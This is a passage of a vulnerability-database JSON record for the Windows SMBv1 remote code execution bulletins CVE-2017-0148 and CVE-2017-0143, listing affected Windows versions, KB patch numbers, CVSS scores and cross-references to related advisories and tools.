"KB4012213", "KB4012217", "KB3177186", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-06T08:45:17", "differentElements": ["msAffectedSoftware"], "edition": 88}], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-06T10:49:13", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-10-06T10:49:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB4012215", "KB3205409", "KB4012216", "KB4012213", "KB3177186", "KB3213986", "KB4012217", "KB3205401", "KB4012212", "KB4012598", "KBMS16-110, 3187754", "KB4012214", "KB3210720", "KB3210721", "KB4013429", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}, "_object_type": "robots.models.mscve.MsCveBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.mscve.MsCveBulletin"]}, {"id": "MS:CVE-2017-0143", "hash": "f324e1b1a767a69b593af7c244e24715", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-06T10:49:13", "history": [{"bulletin": {"id": "MS:CVE-2017-0143", "hash": "26eda409007e1a8c7a93c06533ed2a25eb45dea9e75df925363eb278e2efae4d", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft\nServer Message Block 1.0 (SMBv1) server handles certain requests. An attacker\nwho successfully exploited the vulnerability could gain the ability to execute\ncode on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker\ncould send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1\nhandles these specially crafted requests.\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2019-08-05T14:04:37", "history": [], "viewCount": 6, "enchantments": {"dependencies": {"modified": "2019-08-05T14:04:37", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-08-05T14:04:37", "rev": 2, "value": 7.8, "vector": "NONE"}}, "objectVersion": "1.4", "kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", "KB3210720", "KB3205401", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows RT 8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2019-08-05T14:04:37", "differentElements": ["description"], "edition": 1}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "913c2f0877fdcdf712e8767a5badd996", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2020-08-07T11:48:32", "history": [], "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": 